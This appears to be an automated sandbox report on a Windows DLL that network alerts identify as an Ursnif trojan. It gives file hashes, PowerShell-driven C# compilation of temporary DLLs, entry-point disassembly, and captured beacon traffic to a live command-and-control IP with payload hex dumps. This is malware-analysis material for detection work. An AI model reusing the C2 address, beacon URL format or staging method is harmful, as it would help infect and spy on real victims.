                      SHA-256:82375D2231FDCA453FFBF57DE02F36378A4A1154A7B935AAC10D766F88CF0E40
                      SHA-512:9A9EFBDC23DAF0910E5775EB4FE052B6CCA5439A4D5BF667151FCD0E055DE8F178233F7D1E209059352F00B1897FE448C9526631472401D581FBFC84AAE7C759
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.59433860543945
                      Encrypted:false
                      SSDEEP:24:etGSV/u2Bg85z7xlfwZD6sgdWqtkZfoAWI+ycuZhNyakS6PNnq:6oYb5hFCD6FWdJo71ulya32q
                      MD5:56795B9251ADDEDC268AA628E143A9C5
                      SHA1:16973C86A02C9B3D307AA25A3ADAD1F0F05F1325
                      SHA-256:E28D2E06D00EA056EE86C6793AED037BD75A6DFD1D63100378CDDE049C5A7C9E
                      SHA-512:D0584C6B57A34BB7A3224B739870A4CB6BC87DA8A4D355C3A72AEED08106D3C019096A5627AB26D6CC007EF907725149BB21FF85E4D1D82BABA33923C0778051
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.sb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):868
                      Entropy (8bit):5.3308047202087225
                      Encrypted:false
                      SSDEEP:12:xKIR37Lvkmb6KzsWZE2MKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKaM5DqBVKVrdFAMBJTH
                      MD5:AE184BFF32F3C82CDA83A7144041CC02
                      SHA1:EF366BDA7BD2A422BFF17C7DB20654DDF60A9507
                      SHA-256:EB31DBB8E96AB2747B6EA1425C55A681AC498DF8FC584F80075D000304F4B14E
                      SHA-512:91914CF1BD9069C69248288D4B0AFBF21A65DDEA90BFF2E9AAA24ADA08AE11580500A660418168C6DDCAAFF45F8EAE6813BE109C4A20C23ECB890E6DE4BD3439
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0972257160637633
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryexak7Ynqqj2PN5Dlq5J:+RI+ycuZhNyakS6PNnqX
                      MD5:41270E964816EC4C69225C4FC492514E
                      SHA1:EA9457F4CBF230C99D3E4FF885FDE46E4BD45000
                      SHA-256:41C6EE9B67E14F9616F9DD92586532D396E13BFE8F1D4B97C2930FA89ED740F1
                      SHA-512:801BE92E1AE02CB2C71A1C8424A117F128AE761DC04FAD1503622F8AA0C934C9E96E9CD783ADB2060CFA0F3F28AA2E413782C1068AAE2EDF237CE640C70CF4A6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):4.000171492218837
                      Encrypted:false
                      SSDEEP:24:HPizW9NProXxUuHjhKdNII+ycuZhNyoakST9PNnq92d:lProXCutKdu1ulna3rq9G
                      MD5:D782BF3D7A8FDEB2AD18B0604344ECE8
                      SHA1:424D88E90F7ECD6BF89F3DB4F71881A007BFC402
                      SHA-256:5CF40AEAD24C13B102AD673AA371346B32E26D5BDF3D279B706C1F18B5AA15FB
                      SHA-512:6C2507E2313D03B691F0826C157C98BCE9F9C0ADFD029D0E5446CBB5E7DD6724D765AAF34426F5E53B58FEB35E192AC725578825A51E3AE2E16AF3C30E863F9C
                      Malicious:false
                      Preview:L...'.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP...................j..........SI...........5.......C:\Users\user\AppData\Local\Temp\RES109F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):3.9829744790376203
                      Encrypted:false
                      SSDEEP:24:HhizW9N7izUuHYFhKdNII+ycuZhNyakS6PNnq92d:TezUu4zKdu1ulya32q9G
                      MD5:EE9EDF850E8759E45C86B471C8A75C98
                      SHA1:450268A4ED02C66CD38EAB0754C27752A558A0B2
                      SHA-256:9377B7E127BD8E34E1182E164391BFF0EC2E55A1037FDED981D8C489251A0B7D
                      SHA-512:EF6F71F1E7454FE4AC2A7A34AEC2672DF8AA4F980B0116DA82E1D2D611899FBB9894D0CC59F4F37B75DD418F42C20DED9BDE9B359491AD7DB6EA9CD4804353EB
                      Malicious:false
                      Preview:L...1.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP..................A'..H..Li"\O.QN..........5.......C:\Users\user\AppData\Local\Temp\RES37BE.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.238626608026645
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:tIJVb0BvkI.dll
                      File size:442368
                      MD5:f28f39ada498d66c378fd59227e0f215
                      SHA1:1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
                      SHA256:0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
                      SHA512:33e4035a35c204da87d5c5935dcc81020101cfb9001a1f08c6fe5c374d1bfaa888783c7d735d43de483d5b6235e883e797e0855bed548ff4aa8dbab1b8addf1b
                      SSDEEP:6144:rFpWDfyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rFpoFlJqYhiVDwGU8OqaX1WW3zNg7
                      TLSH:5594F14977A11DBBEC0807761CF8C52B9B66BE2CA23A31DEA6683CFF7E175511048706
                      File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                      Icon Hash:9068eccc64f6e2ad
                      Entrypoint:0x401430
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                      Instruction
                      push ebp
                      mov ebp, esp
                      add ecx, FFFFFFFFh
                      call 00007F191498005Ch
                      pop eax
                      pop eax
                      mov dword ptr [00414544h], eax
                      mov edx, dword ptr [00414660h]
                      sub edx, 00005289h
                      call edx
                      ret
                      int3
                      push esi
                      mov eax, ebx
                      mov dword ptr [00414540h], eax
                      pop dword ptr [00414538h]
                      mov dword ptr [00414548h], ebp
                      mov dword ptr [0041453Ch], edi
                      sub dword ptr [00414548h], FFFFFFFCh
                      loop 00007F1914980005h
                      mov dword ptr [ebp+00h], eax
                      nop
                      pushfd
                      dec esp
                      mov bh, byte ptr [edx+20858137h]
                      inc edi
                      outsb
                      popad
                      adc bh, byte ptr [ebx-737236FDh]
                      rcr byte ptr [ebp-09h], 0000006Eh
                      xor dword ptr [edi+2C9A727Dh], edx
                      push edi
                      and eax, 921D5B11h
                      push ds
                      cmc
                      cdq
                      jmp 00007F19149800B1h
                      pop ebx
                      xor dword ptr [edx+72h], edi
                      ficom dword ptr [ecx+335A9032h]
                      jnp 00007F1914980087h
                      mov bl, 02h
                      ret
                      xchg eax, ebp
                      mov al, byte ptr [61B7C6D2h]
                      jnc 00007F191498002Fh
                      mov edx, 52F2559Ch
                      sti
                      sbb dword ptr [ecx+04h], ebp
                      pop ebx
                      inc esp
                      inc esi
                      dec edi
                      fsubr dword ptr [ebx]
                      cmovne ecx, eax
                      in al, D3h
                      jnl 00007F1914980048h
                      xchg eax, esi
                      xchg eax, esi
                      inc eax
                      pop es
                      cmpsd
                      pop edi
                      das
                      and byte ptr [esi-7Ch], bh
                      pop ecx
                      je 00007F1914980024h
                      pop esp
                      jl 00007F19149800BEh
                      xor al, byte ptr [esi+2Ch]
                      out dx, al
                      mov edi, F721E51Fh
                      pop esi
                      or dword ptr [edi+35h], ecx
                      scasb
                      rcl byte ptr [esi+7Ch], 00000040h
                      popfd
                      int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0736897786458 | data | 1.02203160805 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180541992188 | data | 3.71589026365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373697916667 | data | 6.02717783396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x62360 | 0x666 | data | English | United States
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
RT_ICON | 0x697d0 | 0xea8 | data | English | United States
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
DLL | Import
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
msvcrt.dll | strcoll, fgetwc, srand
Description | Data
LegalCopyright | A Company. All rights reserved.
InternalName |
FileVersion | 1.0.0.0
CompanyName | A Company
ProductName |
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | myfile.exe
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/22-16:27:52.293372 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49738 | 80 | 192.168.2.5 | 13.107.42.16
05/04/22-16:28:12.405919 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 185.189.151.28
05/04/22-16:28:12.829578 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49758 | 80 | 192.168.2.5 | 185.189.151.28
                      • 185.189.151.28
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49758 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2022 16:28:12.405919075 CEST | 500 | OUT | GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
May 4, 2022 16:28:12.702059031 CEST | 502 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:12 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186001
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7ca6803.bin"
May 4, 2022 16:28:12.829577923 CEST | 699 | OUT | GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:28:13.126252890 CEST700INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238738
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7d19b58.bin"
                      Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 
86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                      Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                      May 4, 2022 16:28:13.314977884 CEST952OUTGET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
